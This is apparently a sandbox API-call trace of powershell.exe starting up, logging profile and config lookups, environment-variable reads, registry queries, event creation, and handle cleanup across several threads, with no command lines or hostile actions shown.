	[0801.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0801.059] SetErrorMode (uMode=0x1) returned 0x1
	[0801.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.060] SetErrorMode (uMode=0x1) returned 0x1
	[0801.062] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.062] CoTaskMemFree (pv=0x27bdf0) 
	[0801.064] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.064] CoTaskMemFree (pv=0x27bdf0) 
	[0801.067] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.067] CoTaskMemFree (pv=0x27bdf0) 
	[0801.070] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.070] CoTaskMemFree (pv=0x27bdf0) 
	[0801.072] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.073] CoTaskMemFree (pv=0x27bdf0) 
	[0801.073] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x318
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0801.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0801.075] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0801.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.075] CoTaskMemFree (pv=0x27bdf0) 
	[0801.076] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0801.077] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd920 | out: lpMode=0xcd920) returned 1
	[0802.064] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.064] CoTaskMemFree (pv=0x27bdf0) 
	[0802.066] SetEvent (hEvent=0x328) returned 1
	[0802.066] SetEvent (hEvent=0x2ec) returned 1
	[0802.066] SetEvent (hEvent=0x318) returned 1
	[0802.066] SetEvent (hEvent=0x3a0) returned 1
	[0802.068] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.068] CoTaskMemFree (pv=0x27bdf0) 
	[0802.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd678 | out: phkResult=0xcd678*=0x358) returned 0x0
	[0802.068] RegQueryValueExW (in: hKey=0x358, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd5fc, lpData=0x0, lpcbData=0xcd5f8*=0x0 | out: lpType=0xcd5fc*=0x0, lpData=0x0, lpcbData=0xcd5f8*=0x0) returned 0x2

Thread:
	id = 784
	os_tid = 0x35c


Thread:
	id = 797
	os_tid = 0x1040


Thread:
	id = 1145
	os_tid = 0x1064


Thread:
	id = 1149
	os_tid = 0x10f0


Thread:
	id = 1154
	os_tid = 0x111c


Thread:
	id = 1168
	os_tid = 0x12a8


Thread:
	id = 1172
	os_tid = 0x1ba8

	[0588.551] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.668] RegCloseKey (hKey=0x304) returned 0x0
	[0642.668] RegCloseKey (hKey=0x30c) returned 0x0
	[0642.668] RegCloseKey (hKey=0x308) returned 0x0
	[0738.916] LocalFree (hMem=0x287310) returned 0x0
	[0738.916] RegCloseKey (hKey=0x318) returned 0x0
	[0738.916] LocalFree (hMem=0x287340) returned 0x0
	[0738.916] CloseHandle (hObject=0x2ec) returned 1
	[0738.917] CloseHandle (hObject=0x13) returned 1
	[0738.917] CloseHandle (hObject=0xf) returned 1
	[0753.097] RegCloseKey (hKey=0x2ec) returned 0x0
	[0783.420] RegCloseKey (hKey=0x374) returned 0x0
	[0783.420] RegCloseKey (hKey=0x3b0) returned 0x0
	[0783.421] RegCloseKey (hKey=0x390) returned 0x0
	[0783.421] RegCloseKey (hKey=0x38c) returned 0x0
	[0783.421] RegCloseKey (hKey=0x388) returned 0x0
	[0783.421] RegCloseKey (hKey=0x384) returned 0x0
	[0783.422] RegCloseKey (hKey=0x380) returned 0x0
	[0783.422] RegCloseKey (hKey=0x37c) returned 0x0
	[0783.422] RegCloseKey (hKey=0x378) returned 0x0
	[0783.422] RegCloseKey (hKey=0x350) returned 0x0
	[0783.423] RegCloseKey (hKey=0x3ac) returned 0x0
	[0783.423] RegCloseKey (hKey=0x3a8) returned 0x0
	[0783.423] RegCloseKey (hKey=0x370) returned 0x0
	[0783.423] RegCloseKey (hKey=0x36c) returned 0x0
	[0783.424] RegCloseKey (hKey=0x368) returned 0x0
	[0783.424] RegCloseKey (hKey=0x364) returned 0x0
	[0783.424] RegCloseKey (hKey=0x360) returned 0x0
	[0783.424] RegCloseKey (hKey=0x35c) returned 0x0
	[0783.425] RegCloseKey (hKey=0x358) returned 0x0
	[0783.425] RegCloseKey (hKey=0x354) returned 0x0
	[0783.425] RegCloseKey (hKey=0x3a4) returned 0x0
	[0783.425] RegCloseKey (hKey=0x344) returned 0x0
	[0783.426] RegCloseKey (hKey=0x340) returned 0x0
	[0783.426] RegCloseKey (hKey=0x33c) returned 0x0
	[0783.426] RegCloseKey (hKey=0x338) returned 0x0
	[0783.427] RegCloseKey (hKey=0x334) returned 0x0
	[0783.427] RegCloseKey (hKey=0x330) returned 0x0
	[0783.427] RegCloseKey (hKey=0x32c) returned 0x0
	[0783.427] RegCloseKey (hKey=0x328) returned 0x0
	[0783.428] RegCloseKey (hKey=0x3a0) returned 0x0
	[0783.428] RegCloseKey (hKey=0x2ec) returned 0x0
	[0783.428] RegCloseKey (hKey=0x318) returned 0x0
	[0783.428] RegCloseKey (hKey=0x39c) returned 0x0
	[0783.429] RegCloseKey (hKey=0x398) returned 0x0
	[0888.550] RegCloseKey (hKey=0x358) returned 0x0
	[0897.185] CloseHandle (hObject=0x370) returned 1
	[0897.185] CloseHandle (hObject=0x3a8) returned 1
	[0897.186] CloseHandle (hObject=0x350) returned 1
	[0897.186] CloseHandle (hObject=0x358) returned 1
	[0897.186] CloseHandle (hObject=0x3ac) returned 1
	[0897.187] CloseHandle (hObject=0x378) returned 1
	[0927.591] CertFreeCRLContext (pCrlContext=0x1b839a00) returned 1
	[0927.592] CertFreeCRLContext (pCrlContext=0x1ce676f0) returned 1
	[0927.592] CloseHandle (hObject=0x4ac) returned 1
	[0927.593] CertCloseStore (hCertStore=0x1b7fdcb0, dwFlags=0x0) returned 1
	[0927.593] CertFreeCRLContext (pCrlContext=0x1b839a00) returned 1
	[0927.593] CloseHandle (hObject=0x49c) returned 1
	[0927.594] CloseHandle (hObject=0x498) returned 1
	[0927.594] CertFreeCRLContext (pCrlContext=0x1b839a80) returned 1
	[0927.595] CloseHandle (hObject=0x448) returned 1
	[0927.595] CloseHandle (hObject=0x444) returned 1
	[0927.596] CloseHandle (hObject=0x3ec) returned 1
	[0927.597] CloseHandle (hObject=0x3e8) returned 1
	[0927.597] CertFreeCRLContext (pCrlContext=0x1ce67670) returned 1
	[0927.597] CloseHandle (hObject=0x384) returned 1
	[0927.598] CloseHandle (hObject=0x380) returned 1
	[0927.598] CloseHandle (hObject=0x37c) returned 1
	[0927.599] CloseHandle (hObject=0x370) returned 1
	[0927.599] CloseHandle (hObject=0x3a8) returned 1
	[0927.600] CloseHandle (hObject=0x3ac) returned 1
	[0927.600] CloseHandle (hObject=0x378) returned 1

Thread:
	id = 1210
	os_tid = 0x1a80


Thread:
	id = 1697
	os_tid = 0x23bc

	[0802.911] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0802.917] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0802.922] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.922] CoTaskMemFree (pv=0x27bdf0) 
	[0802.924] VirtualQuery (in: lpAddress=0x1c73da40, lpBuffer=0x1c73e900, dwLength=0x30 | out: lpBuffer=0x1c73e900*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0802.929] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.929] CoTaskMemFree (pv=0x27bdf0) 
	[0802.932] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.932] CoTaskMemFree (pv=0x27bdf0) 
	[0802.935] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0802.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.936] CoTaskMemFree (pv=0x27bdf0) 
	[0803.737] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.737] CoTaskMemFree (pv=0x27bdf0) 
	[0803.743] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.743] CoTaskMemFree (pv=0x27bdf0) 
	[0803.744] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.744] CoTaskMemFree (pv=0x27bdf0) 
	[0803.749] VirtualQuery (in: lpAddress=0x1c73dcf0, lpBuffer=0x1c73ebb0, dwLength=0x30 | out: lpBuffer=0x1c73ebb0*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.750] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.750] CoTaskMemFree (pv=0x27bdf0) 
	[0803.752] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.753] CoTaskMemFree (pv=0x27bdf0) 
	[0803.753] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.753] CoTaskMemFree (pv=0x27bdf0) 
	[0803.754] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.754] CoTaskMemFree (pv=0x27bdf0) 
	[0803.759] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0803.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.759] CoTaskMemFree (pv=0x27bdf0) 
	[0805.955] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.955] CoTaskMemFree (pv=0x27bdf0) 
	[0805.958] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.958] CoTaskMemFree (pv=0x27bdf0) 
	[0805.959] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.959] CoTaskMemFree (pv=0x27bdf0) 
	[0805.966] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.966] CoTaskMemFree (pv=0x27bdf0) 
	[0805.968] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.968] CoTaskMemFree (pv=0x27bdf0) 
	[0805.969] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.970] CoTaskMemFree (pv=0x27bdf0) 
	[0805.972] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0805.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.973] CoTaskMemFree (pv=0x27bdf0) 
	[0806.675] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0806.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.675] CoTaskMemFree (pv=0x27bdf0) 
	[0807.484] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0807.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.484] CoTaskMemFree (pv=0x27bdf0) 
	[0807.489] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0807.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.489] CoTaskMemFree (pv=0x27bdf0) 
	[0808.202] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0808.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.203] CoTaskMemFree (pv=0x27bdf0) 
	[0808.206] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0808.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.206] CoTaskMemFree (pv=0x27bdf0) 
	[0854.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c73d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0854.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c73d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0854.381] CoTaskMemAlloc (cb=0x20c) returned 0x1b802b10
	[0854.381] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b802b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0854.382] CoTaskMemFree (pv=0x1b802b10) 
	[0854.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c73d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0855.407] GetCurrentProcess () returned 0xffffffffffffffff
	[0855.408] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d688 | out: TokenHandle=0x1c73d688*=0x370) returned 1
	[0855.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c73d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0855.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c73d730 | out: lpFileInformation=0x1c73d730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0868.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c73d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0868.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c73d6e0 | out: lpFileInformation=0x1c73d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0880.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c73d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0880.127] SetErrorMode (uMode=0x1) returned 0x1
	[0880.128] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3ac
	[0880.128] GetFileType (hFile=0x3ac) returned 0x1
	[0880.128] SetErrorMode (uMode=0x1) returned 0x1
	[0880.128] GetFileType (hFile=0x3ac) returned 0x1
	[0880.130] GetFileSize (in: hFile=0x3ac, lpFileSizeHigh=0x1c73d6d8 | out: lpFileSizeHigh=0x1c73d6d8*=0x0) returned 0x622a
	[0882.762] ReadFile (in: hFile=0x3ac, lpBuffer=0x30fd188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d5f8, lpOverlapped=0x0 | out: lpBuffer=0x30fd188*, lpNumberOfBytesRead=0x1c73d5f8*=0x1000, lpOverlapped=0x0) returned 1
	[0888.543] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d128, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d128*=0x1000, lpOverlapped=0x0) returned 1
	[0888.543] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d128, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d128*=0x1000, lpOverlapped=0x0) returned 1
	[0888.544] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d128, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d128*=0x1000, lpOverlapped=0x0) returned 1
	[0888.544] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d128, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d128*=0x1000, lpOverlapped=0x0) returned 1
	[0888.550] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d268, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d268*=0x1000, lpOverlapped=0x0) returned 1
	[0888.550] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d0e8, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d0e8*=0x22a, lpOverlapped=0x0) returned 1
	[0889.377] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f92f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c73d188, lpOverlapped=0x0 | out: lpBuffer=0x2f92f00*, lpNumberOfBytesRead=0x1c73d188*=0x0, lpOverlapped=0x0) returned 1
	[0889.849] CloseHandle (hObject=0x3ac) returned 1
	[0891.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c73d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c73d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.312] CoTaskMemAlloc (cb=0x20c) returned 0x1b802b10
	[0891.312] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b802b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0891.312] CoTaskMemFree (pv=0x1b802b10) 
	[0891.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c73d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0891.313] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.313] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d8e8 | out: TokenHandle=0x1c73d8e8*=0x3ac) returned 1
	[0891.314] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.314] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d8e8 | out: TokenHandle=0x1c73d8e8*=0x358) returned 1
	[0891.316] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.316] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d688 | out: TokenHandle=0x1c73d688*=0x3a8) returned 1
	[0891.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c73d730 | out: lpFileInformation=0x1c73d730*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0891.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c73d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c73d6e0 | out: lpFileInformation=0x1c73d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
